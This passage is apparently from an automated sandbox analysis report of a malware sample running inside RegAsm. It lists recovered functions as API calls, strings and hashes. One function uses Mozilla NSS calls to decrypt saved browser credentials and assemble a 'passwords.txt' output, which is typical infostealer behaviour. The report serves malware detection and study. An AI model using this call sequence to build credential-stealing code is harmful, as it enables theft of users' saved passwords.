                                                                                    • HeapFree.KERNEL32(00000000,?,6D187FA0,00000000), ref: 0040E376
                                                                                    • strcpy_s.MSVCRT ref: 0040E3AF
                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E3C6
                                                                                    • HeapFree.KERNEL32(00000000,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E3CD
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E3F3
                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E3FA
                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E401
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E408
                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E41D
                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E424
                                                                                    • strcpy_s.MSVCRT ref: 0040E437
                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E448
                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E44F
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,75B65460,?,6D187FA0), ref: 0040E46A
                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E471
                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,75B65460,?,6D187FA0), ref: 0040E478
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E47F
                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,75B65460,?,6D187FA0), ref: 0040E494
                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E49B
                                                                                    • strcpy_s.MSVCRT ref: 0040E4AE
                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E4BF
                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,75B65460), ref: 0040E4C6
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E4E8
                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E4EF
                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E4F6
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E4FD
                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E515
                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E51C
                                                                                    • strcpy_s.MSVCRT ref: 0040E52F
                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E540
                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E547
                                                                                      • Part of subcall function 0040E156: strlen.MSVCRT ref: 0040E16D
                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E550
                                                                                    • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E560
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E567
                                                                                    • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E593
                                                                                    • strcpy_s.MSVCRT ref: 0040E5B7
                                                                                    • GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,00000001,00000000,?,?,00000000), ref: 0040E5E0
                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E5E7
                                                                                    • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E5EC
                                                                                    • GetProcessHeap.KERNEL32(00000008,00000001,?,?,?,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E5F7
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E5FE
                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E60F
                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E616
                                                                                    • strcpy_s.MSVCRT ref: 0040E624
                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E630
                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,75B65460), ref: 0040E637
                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E65D
                                                                                    • HeapFree.KERNEL32(00000000), ref: 0040E664
                                                                                    • GetProcessHeap.KERNEL32(00000008,00000010), ref: 0040E66B
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040E672
                                                                                    • strcpy_s.MSVCRT ref: 0040E68A
                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E69B
                                                                                    • HeapFree.KERNEL32(00000000), ref: 0040E6A2
                                                                                    • strlen.MSVCRT ref: 0040E6F0
                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E734
                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,75B65460), ref: 0040E73B
                                                                                      • Part of subcall function 0040E204: strchr.MSVCRT ref: 0040E263
                                                                                      • Part of subcall function 0040E204: lstrlenA.KERNEL32(?), ref: 0040E281
                                                                                      • Part of subcall function 0040E204: GetProcessHeap.KERNEL32(00000008,-00000001), ref: 0040E28E
                                                                                      • Part of subcall function 0040E204: HeapAlloc.KERNEL32(00000000), ref: 0040E295
                                                                                      • Part of subcall function 0040E204: strcpy_s.MSVCRT ref: 0040E2D0
                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E787
                                                                                    • HeapFree.KERNEL32(00000000), ref: 0040E78E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$Process$Free$Allocstrcpy_s$lstrlen$H_prologstrchrstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 2599614518-0
                                                                                    • Opcode ID: bc8bb12e550e9466988ecdd805507d8dd5a8f3e6430f6d689f4abeca2a9266a5
                                                                                    • Instruction ID: 55f0d82739dd95474ff7fe735f77d6d86875030ea8a2a65347861b983bd56a5d
                                                                                    • Opcode Fuzzy Hash: bc8bb12e550e9466988ecdd805507d8dd5a8f3e6430f6d689f4abeca2a9266a5
                                                                                    • Instruction Fuzzy Hash: D2E13AB1C0021AAFDF10AFE1DD49AAFBB79FF08304F10082AF615B2191DB794954DB65
                                                                                    Function 6CC955F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(user32,?,6CC6E1A5), ref: 6CC95606
                                                                                    • LoadLibraryW.KERNEL32(gdi32,?,6CC6E1A5), ref: 6CC9560F
                                                                                    • GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6CC95633
                                                                                    • GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6CC9563D
                                                                                    • GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6CC9566C
                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6CC9567D
                                                                                    • GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6CC95696
                                                                                    • GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6CC956B2
                                                                                    • GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6CC956CB
                                                                                    • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6CC956E4
                                                                                    • GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6CC956FD
                                                                                    • GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6CC95716
                                                                                    • GetProcAddress.KERNEL32(00000000,FillRect), ref: 6CC9572F
                                                                                    • GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6CC95748
                                                                                    • GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6CC95761
                                                                                    • GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6CC9577A
                                                                                    • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6CC95793
                                                                                    • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6CC957A8
                                                                                    • GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6CC957BD
                                                                                    • GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6CC957D5
                                                                                    • GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6CC957EA
                                                                                    • GetProcAddress.KERNEL32(?,DeleteObject), ref: 6CC957FF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                    • String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
                                                                                    • API String ID: 2238633743-1964193996
                                                                                    • Opcode ID: 3394951234287e73555ebd44b89cf3b322af3ca4bf4ec0db362da85cab6028ff
                                                                                    • Instruction ID: 60e0a58a143f38bf0554afb9d3c851d7e7888783ac5399ff866542497ea2477e
                                                                                    • Opcode Fuzzy Hash: 3394951234287e73555ebd44b89cf3b322af3ca4bf4ec0db362da85cab6028ff
                                                                                    • Instruction Fuzzy Hash: C75156787117436FDB019FF98E989263AF8AB062467104525F912E2B52FB70CD01CF78
                                                                                    Function 6CC7CC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6CC4582D), ref: 6CC7CC27
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6CC4582D), ref: 6CC7CC3D
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6CCAFE98,?,?,?,?,?,6CC4582D), ref: 6CC7CC56
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6CC4582D), ref: 6CC7CC6C
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6CC4582D), ref: 6CC7CC82
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6CC4582D), ref: 6CC7CC98
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6CC4582D), ref: 6CC7CCAE
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6CC7CCC4
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6CC7CCDA
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6CC7CCEC
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6CC7CCFE
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6CC7CD14
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6CC7CD82
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6CC7CD98
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6CC7CDAE
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6CC7CDC4
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6CC7CDDA
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6CC7CDF0
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6CC7CE06
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6CC7CE1C
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6CC7CE32
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6CC7CE48
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6CC7CE5E
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6CC7CE74
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6CC7CE8A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: strcmp
                                                                                    • String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
                                                                                    • API String ID: 1004003707-2809817890
                                                                                    • Opcode ID: 774738c5f8732272e01d692e99011a24cc8c73497f340e28a2a4dc9d6857460c
                                                                                    • Instruction ID: adbd82381bcde73db592a30a0d374516a24e326067855386c7318992915e659b
                                                                                    • Opcode Fuzzy Hash: 774738c5f8732272e01d692e99011a24cc8c73497f340e28a2a4dc9d6857460c
                                                                                    • Instruction Fuzzy Hash: BE51DDD190662712FE2031966F14BEA2488FF6335AF108076ED19B1F80FF15D60B86B7
                                                                                    Function 004083DC Relevance: 63.3, APIs: 35, Strings: 1, Instructions: 258stringmemoryfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004083E1
                                                                                    • NSS_Init.NSS3(00000000,?,00000000,?), ref: 004083FE
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 004084E1
                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 004084E9
                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004084F5
                                                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 004084FF
                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00408510
                                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040851C
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00408523
                                                                                    • StrStrA.SHLWAPI(?), ref: 00408535
                                                                                    • StrStrA.SHLWAPI(-00000010), ref: 0040854F
                                                                                    • lstrcat.KERNEL32(00000000), ref: 00408563
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00408575
                                                                                    • lstrcat.KERNEL32(00000000,00425D48), ref: 00408583
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00408595
                                                                                    • lstrcat.KERNEL32(00000000,00425D4C), ref: 004085A3
                                                                                    • lstrcat.KERNEL32(00000000), ref: 004085B2
                                                                                    • lstrcat.KERNEL32(00000000,-00000010), ref: 004085BC
                                                                                    • lstrcat.KERNEL32(00000000,00425D50), ref: 004085CA
                                                                                    • StrStrA.SHLWAPI(-000000FE), ref: 004085DA
                                                                                    • StrStrA.SHLWAPI(00000014), ref: 004085EA
                                                                                    • lstrcat.KERNEL32(00000000), ref: 004085FE
                                                                                      • Part of subcall function 004082DE: memset.MSVCRT ref: 00408305
                                                                                      • Part of subcall function 004082DE: lstrlenA.KERNEL32(0040860A,00000001,?,00000014,00000000,00000000,?,0040860A,00000014), ref: 0040831F
                                                                                      • Part of subcall function 004082DE: CryptStringToBinaryA.CRYPT32(0040860A,00000000,?,0040860A,00000014), ref: 00408329
                                                                                      • Part of subcall function 004082DE: PK11_GetInternalKeySlot.NSS3(?,0040860A,00000014), ref: 00408337
                                                                                      • Part of subcall function 004082DE: PK11_Authenticate.NSS3(00000000,00000001,00000000,?,0040860A,00000014), ref: 0040834C
                                                                                      • Part of subcall function 004082DE: PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 00408377
                                                                                      • Part of subcall function 004082DE: memcpy.MSVCRT ref: 00408391
                                                                                      • Part of subcall function 004082DE: PK11_FreeSlot.NSS3(?), ref: 004083C1
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0040860F
                                                                                    • lstrcat.KERNEL32(00000000,00425D54), ref: 0040861D
                                                                                    • StrStrA.SHLWAPI(-000000FE), ref: 0040862D
                                                                                    • StrStrA.SHLWAPI(00000014), ref: 0040863D
                                                                                    • lstrcat.KERNEL32(00000000), ref: 00408651
                                                                                      • Part of subcall function 004082DE: lstrcat.KERNEL32(00425B87,00425B8B), ref: 004083B8
                                                                                      • Part of subcall function 004082DE: lstrcat.KERNEL32(00425B87,00425B8E), ref: 004083D0
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00408662
                                                                                    • lstrcat.KERNEL32(00000000,00425D58), ref: 00408670
                                                                                    • lstrcat.KERNEL32(00000000,00425D5C), ref: 0040867E
                                                                                    • StrStrA.SHLWAPI(-000000FE), ref: 0040868E
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004086A4
                                                                                    • memset.MSVCRT ref: 004086F7
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00408700
                                                                                    • NSS_Shutdown.NSS3 ref: 00408706
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$Filelstrcpy$H_prologK11_lstrlen$HeapPointerSlotmemset$AllocAuthenticateBinaryCloseCryptDecryptFreeHandleInitInternalProcessReadShutdownSizeStringmemcpy
                                                                                    • String ID: passwords.txt
                                                                                    • API String ID: 2888107993-347816968
                                                                                    • Opcode ID: e3018b0a47374fec72a5f2baaef4059925a1376317702e7b48b131a6970e1429
                                                                                    • Instruction ID: 5dc14b0691de5214d02f3ee7ce5d944d84623a026e9eef8f831ba1c7c62f9796
                                                                                    • Opcode Fuzzy Hash: e3018b0a47374fec72a5f2baaef4059925a1376317702e7b48b131a6970e1429
                                                                                    • Instruction Fuzzy Hash: FAA16B72800169EFDB11EBE0DD49EAEBF7AFF19314F101439F611A21A1DB781A09CB65
                                                                                    Function 00417330 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 154libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                    • String ID: kernel32.dll
                                                                                    • API String ID: 2238633743-1793498882
                                                                                    • Opcode ID: d69125541faeae41619a6b364ac2bacfc45b7a5b90ae5f2a75d772f0e7a26e50
                                                                                    • Instruction ID: 3b9a933638e78cfec0d7cf3ab61098210ea9312fa69d0c05088f71d6884a5f02
                                                                                    • Opcode Fuzzy Hash: d69125541faeae41619a6b364ac2bacfc45b7a5b90ae5f2a75d772f0e7a26e50
                                                                                    • Instruction Fuzzy Hash: 9F711A7E811620EFEB525FA0FD08A253BB7F70AB01B14713AEA05C6271E7764961EF14
                                                                                    Function 6CC447C0 Relevance: 49.2, APIs: 23, Strings: 5, Instructions: 232threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6CC44801
                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC44817
                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC4482D
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC4484A
                                                                                      • Part of subcall function 6CC6AB3F: EnterCriticalSection.KERNEL32(6CCBE370,?,?,6CC33527,6CCBF6CC,?,?,?,?,?,?,?,?,6CC33284), ref: 6CC6AB49
                                                                                      • Part of subcall function 6CC6AB3F: LeaveCriticalSection.KERNEL32(6CCBE370,?,6CC33527,6CCBF6CC,?,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC6AB7C
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC4485F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC4487E
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC4488B
                                                                                    • free.MOZGLUE(?), ref: 6CC4493A
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC44956
                                                                                    • free.MOZGLUE(00000000), ref: 6CC44960
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC4499A
                                                                                      • Part of subcall function 6CC6AB89: EnterCriticalSection.KERNEL32(6CCBE370,?,?,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284), ref: 6CC6AB94
                                                                                      • Part of subcall function 6CC6AB89: LeaveCriticalSection.KERNEL32(6CCBE370,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC6ABD1
                                                                                    • free.MOZGLUE(?), ref: 6CC449C6
                                                                                    • free.MOZGLUE(?), ref: 6CC449E9
                                                                                      • Part of subcall function 6CC55E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CC55EDB
